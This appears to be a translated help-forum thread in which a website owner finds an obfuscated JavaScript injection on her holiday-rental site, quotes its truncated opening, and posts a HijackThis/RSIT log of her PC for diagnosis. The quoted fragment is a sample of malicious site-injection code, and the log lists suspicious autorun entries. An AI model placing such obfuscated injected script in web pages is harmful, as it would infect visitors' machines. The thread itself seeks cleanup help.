Trojan horse
chimere06200
Posted on 20/02/2010 at 17:13
Petite astucienne

Hello,

I am new to this forum and a novice with computers. I have a website (holiday cottage rental). For the past few days, a strange message has been appearing on it; here is its content:


try{window.onload=function(){D1btocibhedx = '' + 'r!(!e#(@t(!a&@i&#)l!@@m@^!e&&n^o$()t&^&!-&@@c&#^o#)@m!.!&&m()((o@$n)$e@@#&y@$c!o@n)@!t$!$r)^o#^l!.(&c$o$@&m#).#&x)&e^&(-&c#o^$&m().!&@a$^!v&! ...
How can I get rid of this gibberish and get my site clean again? Visitors will not want to venture onto the site with a message like that.


Edited by chimere06200 on 25/02/2010 11:34
eliot3
Posted on 20/02/2010 at 17:17
  Astucien

Good evening and welcome,

Remove your link; someone who is poorly protected could get infected.

A serious attack on your site; look at this:

Could you have been hacked?



Edited by eliot3 on 20/02/2010 17:20
chimere06200
Posted on 20/02/2010 at 20:20
Petite astucienne

Thanks for your reply. I am still not getting anywhere and I don't know whether I have been hacked. How do I disable my site?

chimere06200
Posted on 20/02/2010 at 22:23
Petite astucienne

Good evening,

Here are the resulting reports, following your advice. What should I do from here?

Thanks again.

Logfile of random's system information tool 1.06 (written by random/random)
Run by maman at 2010-02-20 20:25:59
Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2
System drive C: has 89 GB (61%) free of 145 GB
Total RAM: 2046 MB (48% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:26:47, on 20/02/2010
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18882)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
C:\Program Files\QuickTime\qttask.exe
C:\Windows\WindowsMobile\wmdSync.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Alwil Software\Avast5\AvastUI.exe
C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Philips\SA28XX Device Manager\main.exe
C:\Windows\System32\rundll32.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Windows\system32\conime.exe
C:\Program Files\Common Files\Adobe\Updater6\Adobe_Updater.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Users\maman\Saved Games\Downloads\RSIT.exe
C:\Program Files\trend micro\maman.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [HP Health Check Scheduler] c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [WAWifiMessage] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Mobile-based device management] %windir%\WindowsMobile\wmdSync.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\RunOnce: [Launcher] %WINDIR%\SMINST\launcher.exe
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Sony Ericsson PC Suite] "C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe" /systray /nologon
O4 - HKCU\..\RunOnce: [SpybotDeletingD3059] cmd.exe /c del "C:\Program Files\Everest Poker\casino.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Philips Gestionnaire de périphériques.lnk = C:\Program Files\Philips\SA28XX Device Manager\main.exe
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O13 - Gopher Prefix:
O16 - DPF: {D4323BF2-006A-4440-A2F5-27E3E7AB25F8} - http://a532.g.akamai.net/f/532/6712/5m/virtools.download.akamai.com/6712/player/install/installer.exe
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: Com4Qlb - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard - c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Sony Ericsson OMSI download service (OMSI download service) - Unknown owner - C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: SBSD Security Center Service (SBSDWSCService) - Safer Networking Ltd. - C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Unknown owner - c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe (file missing)
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe

--
End of file - 9158 bytes

======Scheduled tasks folder======

C:\Windows\tasks\HPCeeScheduleFormaman.job
C:\Windows\tasks\Maintenance en 1 clic.job
C:\Windows\tasks\User_Feed_Synchronization-{837C62D4-F802-42E1-BA8C-0E2FF49DE2F0}.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{53707962-6F74-2D53-2644-206D7942484F}]
Spybot-S&D IE Protection - C:\PROGRA~1\SPYBOT~1\SDHelper.dll [2009-01-26 1879896]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{64F56FC1-1272-44CD-BA6E-39723696E350}]
EoBho Class - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
SSVHelper Class - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll [2008-06-10 509328]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7E853D72-626A-48EC-A868-BA8D5E23E045}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-02-17 408440]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"=C:\Program Files\Windows Defender\MSASCui.exe [2008-01-19 1008184]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2007-01-13 827392]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2007-02-13 159744]
"HP Health Check Scheduler"=c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe [2008-06-16 75008]
"hpWirelessAssistant"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [2007-03-01 472776]
"WAWifiMessage"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe [2007-01-10 317128]
"HP Software Update"=C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [2006-12-10 49152]
"EoEngine"= []
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2008-03-02 98304]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
"Windows Mobile-based device management"=C:\Windows\WindowsMobile\wmdSync.exe [2006-11-02 215552]
"NvSvc"=C:\Windows\system32\nvsvc.dll [2007-09-19 86016]
"NvCplDaemon"=C:\Windows\system32\NvCpl.dll [2007-09-19 8497696]
"NvMediaCenter"=C:\Windows\system32\NvMcTray.dll [2007-09-19 81920]
"avast5"=C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe [2010-02-11 2756488]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"=C:\Windows\SMINST\launcher.exe [2006-11-07 44128]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"LightScribe Control Panel"=C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [2007-04-19 484904]
"ehTray.exe"=C:\Windows\ehome\ehTray.exe [2008-01-19 125952]
"Skype"=C:\Program Files\Skype\Phone\Skype.exe [2009-06-26 25604904]
"WMPNSCFG"=C:\Program Files\Windows Media Player\WMPNSCFG.exe [2008-01-19 202240]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe [2009-03-05 2260480]
"Sony Ericsson PC Suite"=C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe [2009-11-20 434176]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SpybotDeletingD3059"=cmd.exe /c del C:\Program Files\Everest Poker\casino.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\32868532]
C:\ProgramData\32868532\32868532.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BitComet]
C:\Program Files\BitComet\BitComet.exe /tray []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CTFMON]
C:\Windows\Temp\_ex-08.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sony Ericsson PC Suite]
C:\Program Files\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe /startoptions []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\sysgif32]
C:\Users\maman\AppData\Local\Temp\~TM50A7.tmp []

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
HP Digital Imaging Monitor.lnk - C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
Philips Gestionnaire de périphériques.lnk - C:\Program Files\Philips\SA28XX Device Manager\main.exe

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfPf]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfRd]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfUsbccidDriver]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"LogonHoursAction"=2
"DontDisplayLogonHoursWarnings"=1

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"EnableUIADesktopToggle"=0

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"BindDirectlyToPropertySetStorage"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{0c39c2ac-4cb5-11dd-b620-001b24dd66d7}]
shell\Auto\command - AdobeR.exe e
shell\AutoRun\command - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL AdobeR.exe e

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{4bee0075-3ed8-11dd-b794-001b24dd66d7}]
shell\AutoRun\command - F:\c.cmd
shell\explore\command - F:\c.cmd
shell\open\command - F:\c.cmd


======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
.txt - open - C:\Windows\notepad.exe %1

======List of files/folders created in the last 1 months======

2010-02-20 20:26:00 ----D---- C:\Program Files\trend micro
2010-02-20 20:25:59 ----D---- C:\rsit
2010-02-11 13:03:38 ----A---- C:\Windows\system32\tsbyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\quartz.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msvidc32.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msrle32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\msvfw32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\mciavi32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\iyuv_32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\avifil32.dll
2010-02-10 21:14:37 ----D---- C:\ProgramData\BVRP Software
2010-02-10 21:11:04 ----A---- C:\ProgramData\hpeA6B.dll
2010-02-10 21:10:37 ----D---- C:\ProgramData\Sony Ericsson
2010-01-24 14:24:34 ----A---- C:\Windows\system32\aswBoot.exe
2010-01-24 11:31:29 ----A---- C:\Windows\wininit.ini
2010-01-24 11:05:34 ----D---- C:\ProgramData\Spybot - Search & Destroy
2010-01-24 11:05:34 ----D---- C:\Program Files\Spybot - Search & Destroy
2010-01-24 10:39:25 ----A---- C:\Windows\system32\mshtml.dll
2010-01-24 10:39:24 ----A---- C:\Windows\system32\ieframe.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\wininet.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\urlmon.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\iertutil.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\occache.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeedsbs.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeeds.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\jsproxy.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieUnatt.exe
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieui.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iesysprep.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iepeers.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iedkcs32.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\msfeedssync.exe
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iesetup.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iernonce.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\ie4uinit.exe
2010-01-23 22:39:44 ----D---- C:\ProgramData\Alwil Software
2010-01-23 16:56:16 ----A---- C:\Windows\ntbtlog.txt
2010-01-23 15:53:04 ----D---- C:\ProgramData\32868532
2010-01-23 08:39:56 ----D---- C:\Users\maman\AppData\Roaming\HpUpdate
2010-01-23 08:39:53 ----D---- C:\Windows\Hewlett-Packard

======List of files/folders modified in the last 1 months======

2010-02-20 20:26:14 ----D---- C:\Windows\Prefetch
2010-02-20 20:26:06 ----D---- C:\Windows\Temp
2010-02-20 20:26:00 ----RD---- C:\Program Files
2010-02-20 20:08:21 ----D---- C:\Users\maman\AppData\Roaming\Skype
2010-02-20 19:37:52 ----A---- C:\Windows\NeroDigital.ini
2010-02-20 19:36:49 ----D---- C:\Program Files\Mozilla Firefox
2010-02-20 16:09:25 ----D---- C:\Users\maman\AppData\Roaming\skypePM
2010-02-20 14:52:44 ----D---- C:\Users\maman\AppData\Roaming\FileZilla
2010-02-20 11:58:32 ----SHD---- C:\System Volume Information
2010-02-20 11:49:06 ----D---- C:\ProgramData\Skyline
2010-02-20 11:35:48 ----SHD---- C:\Windows\Installer
2010-02-20 11:35:43 ----D---- C:\ProgramData\Microsoft Help
2010-02-20 07:46:27 ----D---- C:\Windows\SMINST
2010-02-18 18:32:08 ----D---- C:\Windows
2010-02-16 16:20:22 ----D---- C:\Windows\System32
2010-02-16 16:20:22 ----D---- C:\Windows\inf
2010-02-16 16:20:22 ----A---- C:\Windows\system32\PerfStringBackup.INI
2010-02-13 13:53:55 ----D---- C:\Windows\system32\catroot2
2010-02-11 20:20:35 ----D---- C:\Windows\winsxs
2010-02-11 20:10:25 ----D---- C:\Windows\system32\catroot
2010-02-11 20:06:26 ----D---- C:\Windows\system32\drivers
2010-02-11 20:06:25 ----D---- C:\Program Files\Windows Mail
2010-02-10 21:14:37 ----HD---- C:\ProgramData
2010-02-10 21:10:37 ----HD---- C:\Program Files\InstallShield Installation Information
2010-02-10 21:10:37 ----D---- C:\Program Files\Sony Ericsson
2010-02-01 20:26:20 ----A---- C:\Windows\system32\mrt.exe
2010-01-31 11:48:33 ----D---- C:\Windows\Tasks
2010-01-31 11:48:33 ----D---- C:\Windows\system32\Tasks
2010-01-27 20:51:18 ----D---- C:\Program Files\Internet Explorer
2010-01-24 14:25:00 ----D---- C:\Program Files\Common Files\microsoft shared
2010-01-24 14:00:28 ----D---- C:\Users\maman\AppData\Roaming\Teleca
2010-01-24 14:00:24 ----D---- C:\Windows\Downloaded Installations
2010-01-24 14:00:11 ----D---- C:\Program Files\Common Files\Teleca Shared
2010-01-24 14:00:07 ----D---- C:\Program Files\Common Files
2010-01-24 13:54:46 ----D---- C:\Windows\system32\migration
2010-01-23 22:41:00 ----D---- C:\Program Files\Alwil Software

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr.sys [2010-02-11 23376]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2010-02-11 162512]
R1 aswTdi;avast! Network Shield Support; C:\Windows\system32\drivers\aswTdi.sys [2010-02-11 46672]
R1 eabfiltr;eabfiltr; C:\Windows\system32\DRIVERS\eabfiltr.sys [2006-11-30 8192]
R1 IDSvix86;Symantec Intrusion Prevention Driver; \??\C:\PROGRA~2\Symantec\DEFINI~1\SymcData\idsdefs\20080215.002\IDSvix86.sys [2008-02-13 261680]
R1 kl1;kl1; C:\Windows\system32\DRIVERS\kl1.sys [2007-10-31 110096]
R1 SRTSPX;SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [2007-11-30 43696]
R1 SYMTDI;SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [2007-10-30 191536]
R2 aswFsBlk;aswFsBlk; C:\Windows\system32\drivers\aswFsBlk.sys [2010-02-11 19024]
R2 aswMonFlt;aswMonFlt; \??\C:\Windows\system32\drivers\aswMonFlt.sys [2010-02-11 51792]
R2 mdmxsdk;mdmxsdk; C:\Windows\system32\DRIVERS\mdmxsdk.sys [2006-06-19 12672]
R2 rimmptsk;rimmptsk; C:\Windows\system32\DRIVERS\rimmptsk.sys [2007-02-24 39936]
R2 rimsptsk;rimsptsk; C:\Windows\system32\DRIVERS\rimsptsk.sys [2007-01-23 42496]
R2 rismxdp;Ricoh xD-Picture Card Driver; C:\Windows\system32\DRIVERS\rixdptsk.sys [2007-01-23 37376]
R2 XAudio;XAudio; C:\Windows\system32\DRIVERS\xaudio.sys [2006-11-28 8192]
R3 BCM43XX;Pilote pour carte réseau Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
R3 CmBatt;Pilote pour Batterie à méthode de contrôle ACPI Microsoft; C:\Windows\system32\DRIVERS\CmBatt.sys [2008-01-19 14208]
R3 CnxtHdAudService;Conexant UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDRT32.sys [2008-03-03 188416]
R3 HBtnKey;HBtnKey; C:\Windows\system32\DRIVERS\cpqbttn.sys [2006-06-28 9472]
R3 HSF_DPV;HSF_DPV; C:\Windows\system32\DRIVERS\HSX_DPV.sys [2006-12-07 985600]
R3 HSXHWAZL;HSXHWAZL; C:\Windows\system32\DRIVERS\HSXHWAZL.sys [2006-12-07 207360]
R3 NVENETFD;NVIDIA nForce Networking Controller Driver; C:\Windows\system32\DRIVERS\nvmfdx32.sys [2007-03-07 1059112]
R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2007-09-19 7626400]
R3 nvsmu;nvsmu; C:\Windows\system32\DRIVERS\nvsmu.sys [2007-02-17 12032]
R3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2009-04-11 89088]
R3 SymEvent;SymEvent; \??\C:\Windows\system32\Drivers\SYMEVENT.SYS [2007-12-22 123952]
R3 SynTP;Synaptics TouchPad Driver; C:\Windows\system32\DRIVERS\SynTP.sys [2007-01-13 181432]
R3 usbvideo;Périphérique vidéo USB (WDM); C:\Windows\System32\Drivers\usbvideo.sys [2008-01-19 134016]
R3 winachsf;winachsf; C:\Windows\system32\DRIVERS\HSX_CNXT.sys [2006-12-07 659968]
R3 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\Windows\system32\DRIVERS\wmiacpi.sys [2008-01-19 11264]
S3 BCM43XV;Pilote de la carte réseau extensible Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
S3 Dot4;Pilote MS IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4.sys [2008-01-19 131584]
S3 Dot4Print;Pilote de classe Imprimante pour IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4Prt.sys [2008-01-19 16384]
S3 dot4usb;MS Dot4USB Filter Dot4USB Filter; C:\Windows\system32\DRIVERS\dot4usb.sys [2008-01-19 36864]
S3 drmkaud;Filtre de décodeur DRM (Noyau Microsoft); C:\Windows\system32\drivers\drmkaud.sys [2008-01-19 5632]
S3 E100B;Pilote de carte Intel (R) PRO; C:\Windows\system32\DRIVERS\e100b325.sys [2006-11-02 163328]
S3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDART.sys [2007-04-12 160768]
S3 HSFHWAZL;HSFHWAZL; C:\Windows\system32\DRIVERS\VSTAZL3.SYS [2006-11-02 200704]
S3 ialm;ialm; C:\Windows\system32\DRIVERS\igdkmd32.sys [2006-10-19 1380864]
S3 MSKSSRV;Proxy de service de répartition Microsoft; C:\Windows\system32\drivers\MSKSSRV.sys [2008-01-19 8192]
